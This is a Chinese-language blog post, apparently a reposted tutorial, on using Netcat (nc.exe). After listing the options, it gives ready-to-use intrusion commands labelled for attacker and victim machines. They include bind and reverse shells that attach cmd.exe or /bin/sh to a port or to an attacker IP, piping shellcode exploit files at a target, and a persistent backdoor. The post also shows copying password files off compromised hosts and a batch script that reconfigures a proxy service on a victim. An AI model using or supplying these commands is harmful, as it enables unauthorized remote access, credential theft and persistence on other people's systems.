瑞士軍刀NC用法

nc.exe全稱NetCat,被譽爲網絡安全界的"瑞士軍刀".nc.exe是一個非常標準的telnet客戶端工具,正因爲它的強大功能使得它在入侵時被廣泛應用,成爲黑客們的必備武器之一.

 

 

========================================================
軟件介紹:
工具名:Netcat
作者:Hobbit && Chris Wysopal
類別:開放源碼
平臺:Linux/BSD/Unix/Windows
WINDOWS下版本號:[v1.10 NT]


========================================================
參數介紹: nc.exe -h*即可看到各參數的使用方法。
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d 後臺模式
-e prog 程序重定向,一旦連接,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i secs 延時的間隔
-l 監聽模式,用於入站連接
-L 連接關閉後,仍然繼續監聽
-n 指定數字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地端口號
-r 隨機本地及遠程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 詳細輸出--用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉--用於掃描時
端口的表示方法可寫爲M-N的範圍格式。


========================================================
基本用法:

1)連接到REMOTE主機,例子:
格式:nc -nvv 192.168.x.x 80
講解:連到192.168.x.x的TCP80端口

2)監聽LOCAL主機,例子:
格式:nc -l -p 80
講解:監聽本機的TCP80端口

3)掃描遠程主機,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
講解:掃描192.168.x.x的TCP80到TCP445的所有端口

4)REMOTE主機綁定SHELL,例子:
格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe
講解:綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354端口

5)REMOTE主機綁定SHELL並反向連接,例子:
格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354

講解:綁定REMOTE主機的CMDSHELL並反向連接到192.168.x.x的TCP5354端口

以上爲最基本的幾種用法(其實NC的用法還有很多,
當配合管道命令"|"與重定向命令"<"、">"等等命令功能更強大......)。


========================================================
高級用法:

6)作攻擊程序用,例子:
格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt
講解:連接到192.168.x.x的80端口,並在其管道中發送*c:exploit.txt*的內容(兩種格式確有相同的效果,真是有異曲同工之妙.
附:*c:exploit.txt*爲shellcode等

7)作蜜罐用[1],例子:
格式:nc -L -p 80
講解:使用*-L*(注意L是大寫)可以不停地監聽某一個端口,直到ctrl+c爲止

8)作蜜罐用[2],例子:
格式:nc -L -p 80 > c:log.txt
講解:使用*-L*可以不停地監聽某一個端口,直到ctrl+c爲止,同時把結果輸出到*c:log.txt*中,如果把*>* 改爲*>>*即可以追加日誌
附:*c:log.txt*爲日誌等

9)作蜜罐用[3],例子:
格式1:nc -L -p 80 < c:honeypot.txt
格式2:type.exe c:honeypot.txt|nc -L -p 80
講解:使用*-L*可以不停地監聽某一個端口,直到ctrl+c爲止,並把*c:honeypot.txt*的內容*送*入其管道中

10) 後門
victim machine: //受害者的機器
nc -l -p port -e cmd //win2000
nc -l -p port -e /bin/sh //unix,linux
attacker machine: //攻擊者的機器.
nc ip -p port //連接victim_IP,然後得到一個shell。

11)反向連接
attacker machine: //一般是sql2,遠程溢出,webdavx3攻擊.
//或者wollf的反向連接.
nc -vv -l -p port

victim machine:
nc -e cmd attacker ip -p port
nc -e /bin/sh attacker ip -p port

attacker machine:
nc -vv -l -p port1 /*用於輸入*/
nc -vv -l -p prot2 /*用於顯示*/

victim machine:
nc attacker_ip port1   cmd   nc attacker_ip port2
nc attacker_ip port1   /bin/sh   nc attacker_ip port2
要加參數-s(nc -L -p 139 -d -e cmd -s 對方機器IP)
這樣就可以保證nc優先於NETBIOS。

12)傳送文件:
從肉雞拖密碼文件回來.
nc -d -l -p port < pathfiledest     /*attacker machine*/ 可以shell執行
nc -vv attacker_ip port > pathfile.txt /*victim machine*/ 需要Ctrl+C退出
//肉雞需要gui界面的cmd裏面執行(終端登陸,不如安裝FTP方便).否則沒有辦法輸上傳命令文件到肉雞

nc -vv -l -p port > pathfile.txt      /*victim machine*/ 需要Ctrl+C退出
nc -d victim_ip port < pathfiledest   /*attacker machine*/ 可以shell執行
//這樣比較好.我們登陸終端.入侵其他的肉雞.可以選擇shell模式登陸.
結論: 可以傳輸ascii,bin文件.可以傳輸程序文件.

13) 端口數據抓包.
nc -vv -w 2 -o test.txt www.m4ker.net 80 21-15

< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized...
< 00000084 83 00 00 01 8f # .....
 telnet,自動批處理。

nc victim_ip port < pathfile.cmd   /*victim machine*/ 顯示執行過程.
nc -vv victim_ip port < pathfile.cmd   /*victim machine*/ 顯示執行過程.
nc -d victim_ip port < pathfile.cmd 安靜模式.

_______________file.cmd________________________

 

password
cd %windir%
echo []=[%windir%]
c:
cd
md test
cd /d %windir%system32
net stop sksockserver
snake -config port 11111
net start sksockserver
exit

發佈了44 篇原創文章 · 獲贊 6 · 訪問量 20萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章